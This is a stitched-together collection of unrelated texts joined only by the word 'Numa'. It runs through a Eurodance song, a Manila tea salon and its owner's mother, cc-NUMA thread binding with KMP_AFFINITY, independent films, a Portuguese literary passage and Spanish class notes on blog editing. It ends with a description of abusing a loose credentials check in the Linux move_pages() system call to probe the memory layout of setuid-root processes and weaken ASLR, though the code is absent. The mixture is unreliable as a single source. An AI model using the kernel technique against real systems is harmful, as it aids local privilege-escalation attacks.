No list of Eurotastic songs would be complete without O-Zone’s megahit Dragostea din tei, better known as the Numa Numa song:

This song reached number 1 in 27 diffeent countries and was recorded in dozens of languages from Chinese to Hebrew.

On December 15, 2009, Norma Villa Maraña, who is fondly called “Numa” by her family and friends, celebrated her 79th birthday at Numa Tea Salon.  As you may be wondering as you read this, yes, the tea salon was named in her honor by her daughter Tess Maraña who manages and runs the outlet located in Forbestown, Rizal Drive, Bonifacio Global City.

At 79, Numa is active and keeps herself busy as a pharmacist in Villa Hospital in Taal, Batangas, as well as in helping bring Batangas delicacies to the Numa Tea Salon for customers to enjoy.  Part of her secret to staying strong and young at heart is to devote her time and energy to activities that continue to help her family and to keeping up with developments in the field of pharmacy.  She believes that continuous learning is one ingredient to staying sharp in her golden years.

Tess, indefatigable as always, prepared old time favorites for family and friends.  It was a wonderful time to get together and celebrate.

Since cc-NUMA architectures have become ubiquitous in the x86 server world, it is very important to optimize memory and thread or process placement, especially for Shared-Memory parallelization. In doing so I was pretty successful in optimizing several of our user codes for cc-NUMA architectures by introducing manual binding strategies. I like the cpuinfo tool that comes with Intel MPI 3.x a lot, it is to query how all the cores are related (i.e. which cores share a cache). Based on that output I used to figure out my strategies for every architecture that we have in our center or that I have access to elsewhere. However, during the last couple of days I observed some benchmark results that did not make much sense to me, and today I stumbled upon the cause for that – something I just did not expect. I will tell you in a second, but my statement is: Manual Binding can be a bad thing, although one can achieve a nice speedup by doing it right even experts can easily be fooled, therefore it is high time to get access to a standardized interface to communicate with the threading runtime and the OS!

We have dual-socket Intel Nehalem-EP systems from two different vendors: Sun and HP. The Sun systems are intended for HPC and are equipped with Xeon X5570 (2.93 GHz) CPUs, the HP systems are intended for infrastructure services and are equipped with Xeon E5540 (2.53 GHz) CPUs. Anyhow, I got hold of both, put some jobs on the boxes and was really disappointed by the speedup measurements on the HP system. In investigating the reason for that I found out that the numbering of the logical cores on both systems is different. Oh dear, two dual-socket systems with Intel Nehalem-EP processors, in one system the cores 0 and 1 are on the same socket, but in the other system they are on a different socket. Lets take a look at the output of cpuinfo on the Sun system:

Lets take a closer look at this table. Wherever you find the identification ‘processor’, this refers to the logical core as visible to the operating system. A ‘package’ is a socket, and we have two ‘(hyper-)threads’ per ‘package’. On the Sun system, the logical cores 0 and 1 are located on the same socket, the cores 0 to 8 refer to eight full cores on two sockets making use of all caches. On the HP system, the logical cores 0 and 1 are located on two sockets, the cores 0 to 8 refer to four hyper-threaded cores on two sockets making use of only half the caches. I am not saying one of the two strategies is better – but if you use one machine to determine what the best is for you application, put this into a start-up script and change the machines in between your measurements, that you will be surprised (and not to the good).

How is the core numbering determined? Well, the short answer is “not by the OS, but by the BIOS”; the honest answer is “I don’t know exactly”. The BIOS has a lot of influence, for example one can take a look at the Advanced Configuration and Power Interface Specification (ACPI: http://www.acpi.info/DOWNLOADS/ACPIspec40.pdf) in section 5.2.17 that there is a System Locality Distance Information Table (SLIT) that lists the distance between hardware resources on different NUMA nodes. In theory the OS kernel can make use of that table, and it does or it fills in constant values (i.e. 10 = local, 20 = remote) in case the table is empty. But the ACPI specification does not specify how the table is generated – that is up to the BIOS implementation itself, and probably up to BIOS settings. The important take-away is that (i) BIOS settings influence the core numbering scheme, (ii) obviously BIOS settings are not the same across vendors, (iii) the numbering can change over time anyhow and other OSes (i.e. Windows)  do it differently -> (iv) do not rely on the numbering scheme being static.

What should you do instead? We do not have a standardized way to influence the thread / process binding. Using tools such as numactl (Linux) or start /affinity (Windows) accept core ids as argument, which is far from optimal. The same holds for explicit API calls to do the binding. Instead, the Intel compiler is following a good path: The environment variable KMP_AFFINITY can be used to define an explicit thread-to-core mapping, but it also accepts two strategies: scatter and compact. The idea of scatter is to bind the threads as far apart as possible (to use all the caches and to have all the memory bandwidth available); the idea of compact is to bind the threads as close together as possible (to profit from shared caches). Running a program with two threads using the scatter strategy on the Sun system results in binding thread 0 to the core set {0,8} and thread 1 to the core set {4,12} (-> two sockets). The same experiment on the HP systems results in binding thread 0 to the core set {1,9} and thread 1 to the core set {0,8} (-> two sockets, again). This abstracts from the hardware / system details and allows the user, who might not be an HPC expert, to concentrate on optimizing the application by choosing from just two strategies, still getting “portable performance” on Intel CPUs. A portable thread binding interface is under discussion for OpenMP 3.1 (see my previous blog post), and I am in a strong favor for allowing the user from choosing strategies. The one shortcoming of Intel’s current implementation occurs when you have multiple levels of Shared-Memory parallelization in one application and want to mix strategies – which might make sense. But this could easily be overcome. Let’s see what the future might bring, for now I just fixed my scripts to include a sanity check that the core numbering is indeed as expected…

Coffee and soft drinks dominate the market. Our forebears and some of our generation consider tea as purely medicinal, something one drinks only when suffering from colds and other ailments. Our friend Tess started promoting tea time as a social activity in her T Salon formerly located at Glorietta. In upscale places like five-star hotels, high tea afternoons are regularly held.

Tess has moved to the Global City, at Forbeswood Heights on Rizal Drive, renaming her outlet Numa, in honor of her mother. Here she offers some of the best teas of the world, either to enjoy there or to take home. The history of tea started in 3000 BC in China, then its cultivation spread to India, Japan, Ceylon (now Sri Lanka) and other parts of the world. In England, the Lady of Bedford enhanced the session with savories, presented on the tiered epergne.

There are three types of tea – green, black and oolong. The green has lately become the most popular, perhaps because of the increasing concern for a healthier way of life. Our first green tea drink was at a tea ceremony in Japan, quite a long time ago. We almost didn’t take it because of its consistency and color. We found out this comes from unfermented tea leaves which are roasted immediately after harvest, giving it a strong, bitter taste. This process retains more of the nutrients as compared to the black variety. Outside of the classic teas, there are herbal and scented (with flowers and fruits).

Numa is not only a tea store – it is a dining place for Batangueños who miss their bulanglang and tulingan. At regular intervals, it offers a hearty Batangas buffet for P295 per. On the day we lunched there, they had the typical bulalo with corn and adobong manok sa dilaw (turmeric), among other dishes. We welcomed the dessert of ginataang pindot (pinched), a take on the ginataang halo-halo, but using only the glutinous bilo-bilo (rice balls) and sago, cooked in thick coconut milk and sugar.

They’ve got other offerings – salads, sandwiches, pasta, Pinoy snacks, pancit and cakes. The high tea costs P495 a set, which is good for two. This includes scones with clotted cream, mini sandwiches and pastries. The tea collection consists of packs in 50, 100 and 200 gms. Prices range from P265 to P1,025.

So what’s one thing that all of these people have in common? They were basically nobody’s before they put their stuff on YouTube. Now a days most of their faces or their work is recognized by millions upon millions of people all over the world.

So why am I talking about celebrity YouTuber’s? What I’m trying to convey is a sudden shift in popularity. People are finding more enjoyment in things that aren’t so mainstream as say the latest action movie or romantic comedy. There’s a sudden push for more Independent Films.

Independent Films, as according to the website Make Independent Films, has a technical definition, which is a movie that was funded with less then 50% of the money that comes from one of the big six major film studios to make their movies and a creative definition. The creative definition defines an independent film is any character driven movie that’s made outside the confines of the traditional Hollywood system. It has a very small budget and keeps corporation’s influence out. Most of the time the film has a strong focus on character development coupled with trying to convey a original and controversial story line.

Some of the greatest independent film’s that have become so popular they’ve hit main stream include Saw, The Blair Witch Project, Reservoir Dogs, Pulp Fiction, Monty Python and the Holy Grail, Kill Bill Vol. 1, Thank you for Smoking, Clerks, Little Miss Sunshine and Napoleon Dynamite. One of the greatest things about Independent film making is that everything is low budget so almost no one in the films have that famous of a career. However, from movies like Napoleon Dynamite and Little Miss Sunshine, people like Jon Heder (Napoleon himself) and Abigail Breslin (Olive) have independent films as a launching point and go on to have pretty successful mainstream careers. Other celebrities take a step back from the main stream world and participate in a Independent film like Uma Thurman in Kill Bill Vol. 1.

In recent years the film industry is finding that people are enjoying simpler films that focus on real people in real life situations. The screenplays for these films are usually pretty simple with nothing too extreme to film buy it focuses more on the quality of the character development and plot development as opposed to keeping the audience trapped in a fast paced world of huge explosions and gun fights. What people are asking for, what people are looking to see is real life. Simplicity. We’re looking for film directors, screenwriters and actors to capture who we really are. Now who we are when we close our eyes at night to dream. We are in the age of Nobody’s. We want the nobody’s to become somebody. And independent film making, as well as sites like YouTube, are finally making that possible.

Não se admire de me ver sempre a vaguear com os olhos. De facto é esta a minha maneira de ler, e só assim a leitura me é proveitosa. Se um livro me interessar realmente, não consigo segui-lo mais de poucas linhas porque a minha mente, captando um pensamento que o texto lhe propõe, ou um sentimento, ou uma interrogação, ou uma imagem, faz-lhe uma tangente e salta de pensamento em pensamento, de imagem em imagem, num itinerário de raciocínios e fantasias que precisa de percorrer até ao fim, afastando-me da leitura, e de uma leitura suculenta, embora só consiga ler de cada livro poucas páginas. Mas essas poucas páginas para mim já encerram o universo inteiro, de que não consigo ver o fundo.

El objetivo de esta clase fue aprender a editar y a cómo utilizar el blog creado en la clase pasada. La clase tiene un blog nombrado “Nuestro Blog Informativo”, el aspecto del mismo será cambiado regularmente, por lo cual debes asegurarte de entrar al correcto. Deberías entrar al blog periódicamente para ver aquellos “post” añadidos por nuestros compañeros y profesora que serán de interés y pertinentes para el curso, además temas que no pudieron ser discutidos en la clase.

Con el surgimiento de la Web 2.0, comienza una nueva forma de organizar, los “tags” o etiquetas. A una palabra se le pueden poner varios “tags”, mientras más veces aparezcan ese tags, mas grande se verá la palabra, esto es llamado “tag cloud”.

Para cada clase, un estudiante tendrán que escribir en el blog de la clase lo discutido en la misma, las reglas para hacerlo son las siguientes:

1. Cada vez que escriba en el  blog tiene que anotar su nombre y la fecha en la que la clase fue discutida.
2. Las notas tomadas en la clase de los martes, debe añadirse al blog entre martes o miércoles; y la de los jueves, entre jueves y viernes. De esta manera, el blog se mantendrá organizado y no habrá equivocación en la cronología de las clases.
3. Añadir enlaces, videos, imágenes, tutoriales relacionados al tema.
4. El lenguaje y contenido debe ser apropiado.

Además debe poner tags, la palabra clave para el tag de las notas de la clase siempre va a ser infousc.

Editando tu blog…

1. Añadiendo tu nombre al blog

Para personalizar tu blog tienes que ir a las pestañas de arriba, seleccionar “my account”; “edit profile” y verificar si aparece tu nombre, de no aparecer debes añadirlo para que la profesora pueda reconocerte. Recuerda que cada vez que añadas algo nuevo siempre debes guardarlo para que se registre el cambio.

1. Cambiar el aspecto de tu blog

Existen dos formas para cambiarle el aspecto a tu blog. La primera consiste en ir a las pestañas de arriba y seleccionar “my dashboards”, seleccionas tu blog, luego change theme y escoges el tema que te guste; ó vas al lado izquierdo a “appearance”, luego a “themes”.

1. Para añadir un “post”, puedes:

1)    ir a las pestañas de arriba, selecciona my new post y selecciona tu blog

2)    Bajo post en el lado izquierdo y luego add new.

Escribes el tema, luego el contenido, a esto le puedes añadir imágenes y videos, recuerda siempre utilizar tags.

1. Imágenes, videos y enlaces

Para añadir una imagen, seleccionas el icono de imágenes ( ) y la subes desde tu computadora, al igual que los videos. Otra manera de añadir videos es copiando el URL o Embed; para añadirlo por URL seleccionas el icono de video ( ) que se encuentra en upload/insert, y seleccionas la pestaña de URL. Para añadirlo mediante Embed sólo necesitas seleccionar la pestaña HTML y lo copias, añades los tags y lo publicas.

Para añadir enlaces a una palabra, seleccionas la misma y el icono en forma de cadena ( ), añades el URL y finalmente insert. Si no seleccionas la palabra, el icono no podrás seleccionarlo.

In the same link as mentioned in my previous post Tinnes hinted at interesting things to be done with NUMA having CAP_SYS_NICE through, say, pulseaudio.

I have no idea whether this is the issue he was referring to, but if it was then the issue is actually far more usable than he sketched, as the credentials check is rather wide, and this whole thing is reliably usable in local exploits without having to go through the trouble of getting CAP_SYS_NICE.

When checking out the NUMA code in the Linux kernel I found the following interesting case in the move_pages() systemcall defined in mm/migrate.c and meant to move pages between NUMA nodes, but also query the status of pages.

This credentials check certainly looks interesting, and is easy to pass when we have CAP_SYS_NICE, but there is more. First of all note that tcred specifies the credentials of the remote task, and cred the credentials of the current one. This test is then also passed if the remote uid or saved uid is equal to either our current uid of effective uid. This is easy to satisfy for all setuid root executables, as the uid of the remote executable will start out as the uid of the process that calls execve() on it.

So, if we spawn a process, then we can pass the credentials check in move_pages() and query their status.

Lets whip something up which queries pages through move_pages() to verify this.

As I’m running on x86-64 this will still take forever, but given some additional information, such as knowing the three most significant bytes of the address ranges are not mangled by ASLR anyway we can determine where things are mapped pretty decently.
